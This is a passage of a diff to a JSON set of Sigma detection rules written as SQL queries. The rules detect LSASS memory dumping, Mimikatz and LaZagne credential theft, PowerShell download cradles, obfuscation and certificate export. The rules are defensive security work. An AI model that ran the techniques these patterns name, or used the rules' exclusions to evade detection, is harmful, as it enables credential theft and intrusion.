'%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth 